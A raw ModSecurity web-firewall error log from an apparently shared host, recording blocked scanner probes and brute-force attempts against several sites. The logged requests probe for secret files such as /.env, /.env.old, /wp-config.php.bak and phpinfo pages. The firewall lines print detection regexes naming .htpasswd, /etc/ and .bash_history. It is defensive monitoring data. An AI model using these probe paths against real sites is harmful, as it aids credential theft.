[Tue May 26 15:49:08.613024 2026] [security2:error] [pid 745492:tid 745736] [client 45.148.10.159:42980] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/api/shared/.env"] [unique_id "ahVznImEQglTmoWcfxJ6hwAAAPQ"]
[Tue May 26 15:49:09.090191 2026] [security2:error] [pid 747840:tid 748084] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVznIm6MwAuYuZKxvntxQAAAXw"]
[Tue May 26 15:49:10.472201 2026] [security2:error] [pid 747840:tid 748074] [client 223.123.35.44:36228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVznom6MwAuYuZKxvnt7AAAAXI"]
[Tue May 26 15:49:10.472378 2026] [security2:error] [pid 747840:tid 748074] [client 223.123.35.44:36228] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVznom6MwAuYuZKxvnt7AAAAXI"]
[Tue May 26 15:49:11.282611 2026] [security2:error] [pid 747840:tid 748090] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVznom6MwAuYuZKxvnt8wAAAYI"]
[Tue May 26 15:49:12.228769 2026] [security2:error] [pid 747840:tid 747972] [client 103.153.130.62:49766] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzoIm6MwAuYuZKxvnuCAAAAQw"]
[Tue May 26 15:49:12.228893 2026] [security2:error] [pid 747840:tid 747972] [client 103.153.130.62:49766] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzoIm6MwAuYuZKxvnuCAAAAQw"]
[Tue May 26 15:49:13.061211 2026] [security2:error] [pid 745492:tid 745714] [client 43.173.174.58:58636] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahVzoImEQglTmoWcfxJ6vAAAAN4"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 15:49:13.967059 2026] [security2:error] [pid 745492:tid 745643] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzoYmEQglTmoWcfxJ6zwAAAJc"]
[Tue May 26 15:49:14.763663 2026] [security2:error] [pid 747840:tid 747978] [client 146.174.178.136:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzoom6MwAuYuZKxvnuLAAAARI"]
[Tue May 26 15:49:15.164768 2026] [security2:error] [pid 747840:tid 748043] [client 43.173.173.121:56660] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahVzoom6MwAuYuZKxvnuNgAAAVM"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 15:49:15.568422 2026] [security2:error] [pid 747840:tid 747976] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzo4m6MwAuYuZKxvnuQgAAARA"]
[Tue May 26 15:49:17.310397 2026] [security2:error] [pid 745492:tid 745583] [remote 172.104.164.56:50122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 56.164.104.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVzpYmEQglTmoWcfxJ6_QAAtFc"]
[Tue May 26 15:49:17.704491 2026] [security2:error] [pid 745492:tid 745710] [client 43.173.179.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "haddingtonwines.com"] [uri "/index.php"] [unique_id "ahVzpYmEQglTmoWcfxJ7AAAAANo"], referer: https://haddingtonwines.com/wp-content/themes/ri-winnes/css/font-awesome.css
[Tue May 26 15:49:18.022957 2026] [security2:error] [pid 747840:tid 747997] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzpYm6MwAuYuZKxvnuZwAAASU"]
[Tue May 26 15:49:18.818192 2026] [security2:error] [pid 747840:tid 747977] [client 85.208.96.202:38952] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/features/header-fade/"] [unique_id "ahVzpom6MwAuYuZKxvnueAAAARE"]
[Tue May 26 15:49:18.818325 2026] [security2:error] [pid 747840:tid 747977] [client 85.208.96.202:38952] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/features/header-fade/"] [unique_id "ahVzpom6MwAuYuZKxvnueAAAARE"]
[Tue May 26 15:49:20.553015 2026] [security2:error] [pid 747840:tid 748083] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzqIm6MwAuYuZKxvnulQAAAXs"]
[Tue May 26 15:49:21.217893 2026] [security2:error] [pid 747840:tid 748022] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/.env.old"] [unique_id "ahVzqYm6MwAuYuZKxvnuqwAAAT4"]
[Tue May 26 15:49:21.834597 2026] [security2:error] [pid 747840:tid 747982] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/crm/.env"] [unique_id "ahVzqYm6MwAuYuZKxvnuuwAAARY"]
[Tue May 26 15:49:22.009824 2026] [security2:error] [pid 747840:tid 747971] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/local/.env"] [unique_id "ahVzqom6MwAuYuZKxvnuvQAAAQs"]
[Tue May 26 15:49:22.145562 2026] [security2:error] [pid 747840:tid 748028] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzqYm6MwAuYuZKxvnuuQAAAUQ"]
[Tue May 26 15:49:22.160770 2026] [security2:error] [pid 747840:tid 748007] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/core/.env"] [unique_id "ahVzqom6MwAuYuZKxvnuwQAAAS8"]
[Tue May 26 15:49:22.303472 2026] [security2:error] [pid 747840:tid 747983] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/apps/.env"] [unique_id "ahVzqom6MwAuYuZKxvnuxQAAARc"]
[Tue May 26 15:49:22.444955 2026] [security2:error] [pid 747840:tid 748075] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/application/.env"] [unique_id "ahVzqom6MwAuYuZKxvnuzAAAAXM"]
[Tue May 26 15:49:22.576743 2026] [security2:error] [pid 747840:tid 748031] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.strapptech.com"] [uri "/web/.env"] [unique_id "ahVzqom6MwAuYuZKxvnuzQAAAUc"]
[Tue May 26 15:49:22.609033 2026] [security2:error] [pid 747840:tid 747972] [client 103.153.130.62:50048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzqom6MwAuYuZKxvnu0AAAAQw"]
[Tue May 26 15:49:22.609205 2026] [security2:error] [pid 747840:tid 747972] [client 103.153.130.62:50048] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzqom6MwAuYuZKxvnu0AAAAQw"]
[Tue May 26 15:49:22.868046 2026] [security2:error] [pid 747840:tid 748021] [client 45.148.10.159:44560] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "mail.strapptech.com"] [uri "/wp-config.php.bak"] [unique_id "ahVzqom6MwAuYuZKxvnu1wAAAT0"]
[Tue May 26 15:49:23.273146 2026] [security2:error] [pid 747840:tid 747975] [client 223.123.35.44:36229] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzq4m6MwAuYuZKxvnu2wAAAQ8"]
[Tue May 26 15:49:23.273286 2026] [security2:error] [pid 747840:tid 747975] [client 223.123.35.44:36229] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzq4m6MwAuYuZKxvnu2wAAAQ8"]
[Tue May 26 15:49:24.395779 2026] [security2:error] [pid 747840:tid 747996] [client 193.37.33.140:40117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.33.37.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "afstpaul.org"] [uri "/wp-login.php"] [unique_id "ahVzrIm6MwAuYuZKxvnu8gAAASQ"]
[Tue May 26 15:49:24.589486 2026] [security2:error] [pid 747840:tid 748014] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzrIm6MwAuYuZKxvnu8QAAATY"]
[Tue May 26 15:49:24.779905 2026] [security2:error] [pid 747840:tid 747997] [client 114.119.133.194:38353] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVzrIm6MwAuYuZKxvnu9wAAASU"], referer: http://haddingtonwines.com/cart?remove_item=aafd8346a677af9db717afeadf6b62ec
[Tue May 26 15:49:24.817067 2026] [security2:error] [pid 745492:tid 745734] [client 45.148.10.159:44568] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/info.php"] [unique_id "ahVzrImEQglTmoWcfxJ7ZQAAAPI"]
[Tue May 26 15:49:26.480185 2026] [security2:error] [pid 745492:tid 745633] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzromEQglTmoWcfxJ7cwAAAI0"]
[Tue May 26 15:49:26.964847 2026] [security2:error] [pid 747840:tid 748094] [client 74.7.175.135:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVzrom6MwAuYuZKxvnvGgAAAYY"]
[Tue May 26 15:49:26.965671 2026] [security2:error] [pid 747840:tid 748087] [client 74.7.175.135:40770] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.mosykay.com"] [uri "/robots.txt"] [unique_id "ahVzrom6MwAuYuZKxvnvGAABfz0"]
[Tue May 26 15:49:27.066736 2026] [security2:error] [pid 747840:tid 748063] [client 74.7.175.187:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.mosykay.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVzr4m6MwAuYuZKxvnvIQAAAWc"]
[Tue May 26 15:49:27.097953 2026] [security2:error] [pid 745492:tid 745747] [client 74.7.175.187:51458] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "www.mosykay.com.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVzr4mEQglTmoWcfxJ7fwAA_wI"]
[Tue May 26 15:49:27.777608 2026] [security2:error] [pid 745492:tid 745640] [client 143.110.243.118:40336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/cgi-bin/ffAA531.php"] [unique_id "ahVzr4mEQglTmoWcfxJ7hQAAAJQ"]
[Tue May 26 15:49:28.501376 2026] [security2:error] [pid 747840:tid 748051] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzsIm6MwAuYuZKxvnvUgAAAVs"]
[Tue May 26 15:49:29.003511 2026] [security2:error] [pid 747840:tid 748041] [client 138.229.107.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzsIm6MwAuYuZKxvnvYwAAAVE"], referer: https://www.anujtradingco.com/
[Tue May 26 15:49:29.191151 2026] [security2:error] [pid 745492:tid 745635] [client 45.148.10.159:53180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.strapptech.com"] [uri "/dashboard/phpinfo.php"] [unique_id "ahVzsYmEQglTmoWcfxJ7mgAAAI8"]
[Tue May 26 15:49:30.331528 2026] [security2:error] [pid 747840:tid 747998] [client 138.229.107.186:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzsom6MwAuYuZKxvnvdQAAASY"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1242310&moderation-hash=12db71cca33677fe78974b191f9624fa
[Tue May 26 15:49:30.674212 2026] [security2:error] [pid 745492:tid 745700] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzsomEQglTmoWcfxJ7rQAAANA"]
[Tue May 26 15:49:31.594201 2026] [security2:error] [pid 747840:tid 748032] [client 176.65.139.239:58560] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "ntgpnk.in"] [uri "/.env"] [unique_id "ahVzs4m6MwAuYuZKxvnvkgAAAUg"]
[Tue May 26 15:49:32.453096 2026] [security2:error] [pid 747840:tid 748070] [client 114.119.146.120:30007] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ameritradeng.com"] [uri "/robots.txt"] [unique_id "ahVztIm6MwAuYuZKxvnvqwAAAW4"]
[Tue May 26 15:49:32.666236 2026] [security2:error] [pid 747840:tid 748008] [client 143.110.243.118:40338] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/cgi-bin/991176.php"] [unique_id "ahVztIm6MwAuYuZKxvnvrQAAATA"]
[Tue May 26 15:49:32.672305 2026] [security2:error] [pid 745492:tid 745742] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVztImEQglTmoWcfxJ70gAAAPo"]
[Tue May 26 15:49:32.927757 2026] [security2:error] [pid 747840:tid 748077] [client 45.205.1.28:51282] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 28.1.205.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "landsonlogistics.com"] [uri "/bitrix/css/main/themes/0x1.php"] [unique_id "ahVztIm6MwAuYuZKxvnvtQAAAXU"]
[Tue May 26 15:49:33.005650 2026] [security2:error] [pid 747840:tid 748094] [client 103.153.130.62:50428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVztYm6MwAuYuZKxvnvuQAAAYY"]
[Tue May 26 15:49:33.005763 2026] [security2:error] [pid 747840:tid 748094] [client 103.153.130.62:50428] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVztYm6MwAuYuZKxvnvuQAAAYY"]
[Tue May 26 15:49:34.896868 2026] [security2:error] [pid 747840:tid 748004] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVztom6MwAuYuZKxvnv0wAAASw"]
[Tue May 26 15:49:36.946034 2026] [security2:error] [pid 747840:tid 748033] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzuIm6MwAuYuZKxvnv-wAAAUk"]
[Tue May 26 15:49:37.085222 2026] [security2:error] [pid 747840:tid 748044] [client 20.104.227.76:15265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.227.104.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "webmail.stockmarketanalysis.in"] [uri "/wk/index.php"] [unique_id "ahVzuYm6MwAuYuZKxvnwAgAAAVQ"]
[Tue May 26 15:49:37.674376 2026] [security2:error] [pid 747840:tid 748075] [client 127.0.0.1:46744] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "400"] [hostname "127.0.0.1"] [uri "/cgi-sys/autodiscover.cgi"] [unique_id "ahVzuYm6MwAuYuZKxvnwDgAAAXM"]
